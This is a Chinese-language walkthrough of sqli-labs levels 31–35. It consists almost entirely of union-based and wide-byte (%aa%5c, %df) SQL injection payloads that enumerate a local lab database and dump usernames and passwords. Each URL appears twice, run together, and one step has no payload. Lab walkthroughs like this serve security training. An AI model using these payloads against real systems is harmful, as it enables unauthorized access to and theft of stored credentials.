sql-labs31-35关通关攻略

第三十一关

一.判断闭合

1“”

二.查询数据库

http://127.0.0.1/Less-31/?id=-1%22)%20union%20select%201,2,database()--+http://127.0.0.1/Less-31/?id=-1%22)%20union%20select%201,2,database()--+

三.查表

http://127.0.0.1/Less-31/?id=-1%22)%20union%20select%201,2,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27)--+http://127.0.0.1/Less-31/?id=-1%22)%20union%20select%201,2,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27)--+

四.查列

http://127.0.0.1/Less-31/?id=-1%22)%20union%20select%201,2,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27)--+http://127.0.0.1/Less-31/?id=-1%22)%20union%20select%201,2,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27)--+

五.查询users表中所有数据

第三十二关

一.判断闭合点

1’

二.查询数据库

http://127.0.0.1/Less-32/?id=-1%aa%5c%27%20union%20select%201,2,database()%20--+http://127.0.0.1/Less-32/?id=-1%AA%5C%27%20union%20select%201,2,database()%20--+

三.查表

http://127.0.0.1/Less-32/?id=-1%aa%5c%27%20union%20select%201,2,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database())%20--+http://127.0.0.1/Less-32/?id=-1%AA%5C%27%20union%20select%201,2,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database())%20--+

四.查列

http://127.0.0.1/Less-32/?id=-1%aa%5c%27%20union%20select%201,2,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=(select%20right(group_concat(table_name),5)%20from%20information_schema.columns%20where%20table_schema=database()))--+http://127.0.0.1/Less-32/?id=-1%AA%5C%27%20union%20select%201,2,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=(select%20right(group_concat(table_name),5)%20from%20information_schema.columns%20where%20table_schema=database()))--+

五.查user表中所有数据

http://127.0.0.1/Less-32/?id=-1%aa%5c%27%20union%20select%201,2,group_concat(username,0,password)%20from%20users--+http://127.0.0.1/Less-32/?id=-1%AA%5C%27%20union%20select%201,2,group_concat(username,0,password)%20from%20users--+

三十三关

一判断闭合方式

1’

二.查询数据库

http://127.0.0.1/Less-33/?id=-1%aa%5c%27%20union%20select%201,2,database()--+http://127.0.0.1/Less-33/?id=-1%AA%5C%27%20union%20select%201,2,database()--+

三.查表

http://127.0.0.1/Less-33/?id=-1%aa%5c%27%20union%20select%201,2,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database())--+http://127.0.0.1/Less-33/?id=-1%AA%5C%27%20union%20select%201,2,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database())--+

四.查列

http://127.0.0.1/Less-33/?id=-1%aa%5c%27%20union%20select%201,2,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=(select%20right(group_concat(table_name),5)%20from%20information_schema.tables%20where%20table_schema=database()))--+http://127.0.0.1/Less-33/?id=-1%AA%5C%27%20union%20select%201,2,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=(select%20right(group_concat(table_name),5)%20from%20information_schema.tables%20where%20table_schema=database()))--+

五.查user表里所有数据

http://127.0.0.1/Less-33/?id=-1%aa%5c%27%20union%20select%201,2,(select%20group_concat(username,0,password)%20from%20security.users)--+http://127.0.0.1/Less-33/?id=-1%AA%5C%27%20union%20select%201,2,(select%20group_concat(username,0,password)%20from%20security.users)--+

第三十四关

一.利用burp进行抓包

二.查询数据库

uname=-1%df' union select 1,2#&passwd=1&submit=Submit

三.查表

uname=-1%df' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#&passwd=1&submit=Submit

四.查列

uname=-1%df' union select 1,group_concat(column_name) from information_schema.columns where table_name=0x656D61696C73#&passwd=1&submit=Submit

五.查user表中所有数据

uname=-1%df' union select 1,group_concat(id,0x3a,email_id) from emails#&passwd=1&submit=Submit

第三十五关

一.查询数据库

http://127.0.0.1/Less-35/?id=-1%20union%20select%201,2,database()--+http://127.0.0.1/Less-35/?id=-1%20union%20select%201,2,database()--+

二. 查表

http://127.0.0.1/Less-35/?id=-1%20union%20select%201,2,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database())--+http://127.0.0.1/Less-35/?id=-1%20union%20select%201,2,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database())--+

三.查列

http://127.0.0.1/Less-35/?id=-1%20union%20select%201,2,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=(select%20right(group_concat(table_name),5)%20from%20information_schema.tables%20where%20table_schema=database()))--+http://127.0.0.1/Less-35/?id=-1%20union%20select%201,2,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=(select%20right(group_concat(table_name),5)%20from%20information_schema.tables%20where%20table_schema=database()))--+

四.查user表里所有数据

http://127.0.0.1/Less-35/?id=-1%20union%20select%201,2,(select%20group_concat(username,0,password)%20from%20security.users)--+http://127.0.0.1/Less-35/?id=-1%20union%20select%201,2,(select%20group_concat(username,0,password)%20from%20security.users)--+